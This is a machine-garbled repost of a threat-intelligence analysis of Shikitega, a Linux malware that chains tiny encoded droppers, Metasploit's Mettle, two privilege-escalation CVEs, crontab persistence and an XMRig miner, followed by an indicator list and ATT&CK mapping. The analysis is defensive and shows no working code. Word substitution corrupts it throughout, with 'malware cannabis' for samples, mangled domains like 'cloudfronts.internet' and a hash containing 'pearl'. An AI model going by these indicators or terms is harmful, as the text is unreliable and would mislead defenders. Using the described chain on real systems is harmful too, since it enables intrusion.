Shikitega – New stealthy malware concentrating on Linux | Videogames Tech

Govt Abstract

AT&T Alien Labs found new malware concentrating on endpoints and IoT gadgets working Linux working techniques. Shikitega is delivered in a multi-stage an infection chain the place every module responds to 1 a part of the payload and downloads and executes the following. An attacker can achieve full management of the system, plus the cryptocurrency miner to be working and set to persist.

Key takeaways:

• The malware downloads and executes Metasploit’s “Mettle” meterpreter to maximise its management over contaminated machines.
• Shikitega exploits system vulnerabilities to realize excessive privileges, persist and run crypto miner.
• The malware makes use of a polymorphic encoder to make it more durable for antivirus engines to detect.
• Shikitega abuses reliable cloud providers to host a few of its command and management (C&C) servers.

Determine 1. Shikitega operation course of.

Background

With a virtually 650% enhance in Linux malware and ransomware this 12 months, reaching an all-time excessive within the first half of 2022, risk actors are encountering servers, endpoints, and IoT gadgets primarily based on Linux working techniques increasingly more. extra beneficial and discover new methods to ship their malicious payloads. New malware akin to BotenaGo and EnemyBot are examples of malware writers shortly incorporating newly found vulnerabilities to search out new victims and enhance their attain.

Shikitega makes use of a multi-layer an infection chain, the place the primary one incorporates just a few hundred bytes, and every module is chargeable for a particular process, from downloading and working Metasploit meterpreter, to exploiting Linux vulnerabilities, to configuring persistence on the contaminated machine. till downloading and working a cryptominer.

Evaluation

The principle dropper of the malware is a really small ELF file, the place its complete measurement is round solely 370 bytes, whereas the precise measurement of the code is round 300 bytes. (Determine 2)

Determine 2. Malicious ELF file with a complete of solely 376 bytes.

The malware makes use of the “Shikata Ga Nai” polymorphic XOR additive suggestions encoder, which is among the hottest encoders utilized in Metasploit. Utilizing the encoder, the malware runs by a number of decoding loops, the place one loop decodes the following layer, till the ultimate shellcode payload is decoded and executed. The encoder pin is generated primarily based on dynamic instruction substitution and dynamic block ordering. Additionally, data are dynamically chosen. Subsequent we will see how the encoder decrypts the primary two loops: (figures 3 and 4)

Determine 3. First “Shikata Ga Nai” decryption loop.

Determine 4. Second “Shikata Ga Nai” decryption loop created by the primary.

After a number of decryption loops, the ultimate payload shellcode will likely be decrypted and executed. For the reason that malware doesn’t use any import, it makes use of ‘int 0x80’ to execute the suitable system name. As the primary code of the dropper could be very small, the malware will obtain and execute further instructions from its command and management by calling 102 syscall (sys_socketcall). (Determine 5)

Determine 5. Name system features utilizing interrupts

The C&C will reply with further shell instructions to execute, as seen within the packet seize in Determine 6. The primary bytes marked in blue are the shell instructions that the malware will execute.

Determine 6. Extra instructions acquired from C&C.

The acquired command will obtain further recordsdata from the server that won’t be saved on the exhausting drive, however will likely be executed solely from reminiscence. (Determine 7)

Determine 7. Execute further shell code acquired from C&C.

In different malware variations, it’ll use the “execve” system name to execute ‘/bin/sh’ with the command acquired from the C&C. (determine 8)

Determine 8. Executing shell instructions utilizing syscall_execve.

The malware downloads and executes ‘Mettle’, a Metasploit meterpreter that enables the attacker to make use of a variety of assaults from webcam management, sniffer, a number of reverse shells (tcp/http…), course of management, command execution shell and extra.

Moreover, the malware will use wget to obtain and run the following stage dropper.

subsequent stage dropper

The following downloaded and executed file is a further small ELF file (about 1kb) encoded with the “Shikata Ga Nai” encoder. The malware decrypts a shell command to be executed by calling syscall_execve with ‘/bin/sh” as a parameter with the decrypted shell. (Determine 9)

Determine 9. The second-stage dropper decrypts and executes shell instructions.

The executed shell command will obtain and execute further recordsdata. To run the following and remaining stage dropper, you’ll exploit two Linux privilege exploit vulnerabilities: CVE-2021-4034 and CVE-2021-3493 (Figures 10 and 11).

Determine 10. Exploitation of Linux vulnerability CVE-2021-3493.

Determine 11. Exploitation of vulnerability CVE-2021-4034.

The malware will make the most of the exploit to obtain and execute the ultimate stage with root privileges: cryptominer persistence and payload.

Persistence

To be able to obtain persistence, the malware will obtain and execute a complete of 5 shell scripts. It persists within the system by organising 4 crontabs, two for the present logged in consumer and the opposite two for the foundation consumer. It can first verify if the crontab command exists on the machine, and if not, the malware will set up it and begin the crontab service.

To make sure that just one occasion is working, you may use the flock command with a “/var/tmp/vm.lock” lock file.

Determine 12. Including root crontab to run the ultimate payload.

Under is the checklist of scripts downloaded and executed to realize persistence:

script title	particulars
unix.sh	Examine if there are any “crontab” instructions on the system, if not, set up it and begin the crontab service.
brict.sh	Add crontab for the present consumer to run cryptominer.
politrict.sh	Add root crontab to run cryptominer.
truct.sh	Add crontab for present consumer to obtain cryptominer and config from C&C.
prohibit.sh	Add root crontab to obtain cryptominer and config from C&C.

For the reason that malware persists with crontabs, it’ll delete all downloaded recordsdata from the system to cover its presence.

Cryptominer Payload

The malware downloads and runs the XMRig miner, a preferred miner for the Monero cryptocurrency. Additionally, you will arrange a crontab to obtain and run the cryptominer and configuration from the C&C as talked about within the persistence half above.

Determine 13. The XMRig miner is downloaded and executed on an contaminated machine.

command and management

Shikitega makes use of cloud options to host a few of its command and management (C&C) servers as proven in OTX in determine 14. For the reason that malware in some circumstances communicates with the command and management server immediately utilizing the IP with out area title, it’s troublesome to supply an entire checklist of flags for detections as they’re risky and will likely be used for reliable functions in a brief time period.

Determine 14. Command and management server hosted on a reliable cloud internet hosting service.

Really helpful actions

1. Preserve your software program updated with safety updates.
2. Set up Antivirus and/or EDR on all endpoints.
3. Use a backup system to again up server recordsdata.

conclusion

Menace actors proceed to search for methods to ship malware in new methods to remain underneath the radar and keep away from detection. Shiketega malware is delivered in a classy means, it makes use of a polymorphic encoder and steadily delivers its payload the place every step reveals solely part of the full payload. Moreover, the malware abuses identified internet hosting providers to host its command and management servers. Keep secure!

Related indicators (IOC)

The next technical indicators are related to reported intelligence. A listing of indicators can also be out there in OTX Pulse. Please notice that pulse could embody different associated actions however outdoors the scope of the report.

WRITE	INDICATOR	DESCRIPTION
DOMAIN	sprint[.]cloudflare.ovh	command and management
DOMAIN	main[.]cloudfronts.internet	command and management
SHA256	b9db845097bbf1d2e3b2c0a4a7ca93b0dc80a8c9e8dbbc3d09ef77590c13d331	malware cannabis
SHA256	0233dcf6417ab33b48e7b54878893800d268b9b6e5ca6ad852693174226e3bed	malware cannabis
SHA256	f7f105c0c669771daa6b469de9f99596647759d9dd16d0620be90005992128eb	malware cannabis
SHA256	8462d0d14c4186978715ad5fa90cbb679c8ff7995bcefa6f9e11b16e5ad63732	malware cannabis
SHA256	d318e9f2086c3cf2a258e275f9c63929b4560744a504ced68622b2e0b3f56374	malware cannabis
SHA256	fc97a8992fa2fe3fd98afddcd03f2fc8f1502dd679a32d1348a9ed5b208c4765	malware cannabis
SHA256	e4a58509fea52a4917007b1cd1a87050b0109b50210c5d00e08ece1871af084d	malware cannabis
SHA256	cbdd24ff70a363c1ec89708367e141ea2c141479cc4e3881dcd989eec859135d	malware cannabis
SHA256	d5bd2b6b86ce14fbad5442a0211d4cb1d56b6c75f0b3d78ad8b8dd82483ff4f8	malware cannabis
SHA256	29aafbfd93c96b37866a89841752f29b55badba386840355b682b1853efafcb8	malware cannabis
SHA256	4ed78c4e90ca692f05189b80ce150f6337d237aaa846e0adf7d8097fcebacfe7	malware cannabis
SHA256	130888cb6930500cf65fc43522e2836d21529cab9291c8073873ad7a90c1fbc5	malware cannabis
SHA256	3ce8dfaedb3e87b2f0ad59e1c47b9b6791b99796d38edc3a72286f4b4e5dc098	malware cannabis
SHA256	6b514e9a30cbb4d6691dd0ebdeec73762a488884eb0f67f8594e07d356e3d275	malware cannabis
SHA256	7c70716a66db674e56f6e791fb73f6ce62ca1ddd8b8a51c74fc7a4ae6ad1b3ad	malware cannabis
SHA256	2b305939d1069c7490b3539e2855ed7538c1a83eb2baca53e50e7ce1b3a165ab	CVE-2021-3493 malware hash
SHA256	4dcae1bddfc3e2cb98eae84e86fb58ec14ea6ef00778ac5974c4ec526d3da31f	CVE-2021-4034 malware hash
SHA256	e8e90f02705ecec9e73e3016b8b8fe915873ed0add87923bf4840831f807a4b4	malware cannabis
SHA256	64a31abd82af27487985a0c0f47946295b125e6d128819d1cbd0f6b62a95d6c4	Malware shell script
SHA256	623e7ad399c10f0025fba333a170887d0107pearl29b60b07f5e93d26c9124955	Malware shell script
SHA256	59f0b03a9ccf8402e6392e07af29e2cfa1f08c0fc862825408dea6d00e3d91af	Malware shell script
SHA256	9ca4fbfa2018fe334ca8f6519f1305c7fbe795af9eb62e9f58f09e858aab7338	Malware shell script
SHA256	05727581a43c61c5b71d959d0390d31985d7e3530c998194670a8d60e953e464	Malware shell script
SHA256	ea7d79f0ddb431684f63a901afc596af24898555200fc14cc2616e42ab95ea5d	malware cannabis

Assigned to MITER ATT&CK

The findings of this report are assigned to the next MITER ATT&CK matrix methods:

• TA0002: Execution
  • T1059: Interpreter of instructions and scripts
  • T1569: System Service
    • T1569.002: Execution of the Service
• TA0003: Persistence
  • T1543: Create or modify system course of
• TA0005: Protection Evasion
  • T1027: Info or recordsdata obfuscated